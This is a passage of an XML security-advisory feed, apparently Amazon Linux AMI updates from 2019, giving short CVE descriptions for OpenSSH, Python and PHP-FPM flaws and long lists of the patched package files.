An issue was discovered in OpenSSH 7.9. Due to missing character encoding in the progress display, a malicious server (or Man-in-The-Middle attacker) can employ crafted object names to manipulate the client output, e.g., by using ANSI control codes to hide additional files being transferred. This affects refresh_progress_meter() in progressmeter.c.
1666119:
CVE-2019-6109 openssh: Missing character encoding in progress display allows for spoofing of scp client output
CVE-2018-20685:
In OpenSSH 7.9, scp.c in the scp client allows remote SSH servers to bypass intended access restrictions via the filename of . or an empty filename. The impact is modifying the permissions of the target directory on the client side.
1665785:
CVE-2018-20685 openssh: scp client improper directory name validation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20685" title="" id="CVE-2018-20685" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6109" title="" id="CVE-2019-6109" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6111" title="" id="CVE-2019-6111" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-ldap" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="21.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-21.73.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.21.73.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.21.73.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-21.73.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="21.73.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-21.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1314</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1314: medium priority package update for python27 python34 python35 python36</title><issued date="2019-10-28 17:10:00" /><updated date="2019-10-30 20:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16056:
An issue was discovered in Python through 2.7.16, 3.x through 3.5.7, 3.6.x through 3.6.9, and 3.7.x through 3.7.4. The email module wrongly parses email addresses that contain multiple @ characters. An application that uses the email module and implements some kind of checks on the From/To headers of a message could be tricked into accepting an email address that should be denied. An attack may be the same as in CVE-2019-11340; however, this CVE applies to Python more generally.
99999:
CVE-2019-16056 python: email.utils.parseaddr wrongly parses email addresses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16056" title="" id="CVE-2019-16056" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-libs" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.48.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.48.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.24.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.24.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.130.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.130.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.130.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.130.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.8-1.15.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.8-1.15.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.8-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1315</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1315: critical priority package update for php71 php72 php73 php56</title><issued date="2019-10-31 20:13:00" /><updated date="2019-11-01 20:24:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11043:
In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.
99999:
CVE-2019-11043 php: underflow in env_path_info in fpm_main.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11043" title="" id="CVE-2019-11043" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-debuginfo" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.33" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.33-1.43.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.33" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.33-1.43.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.24" 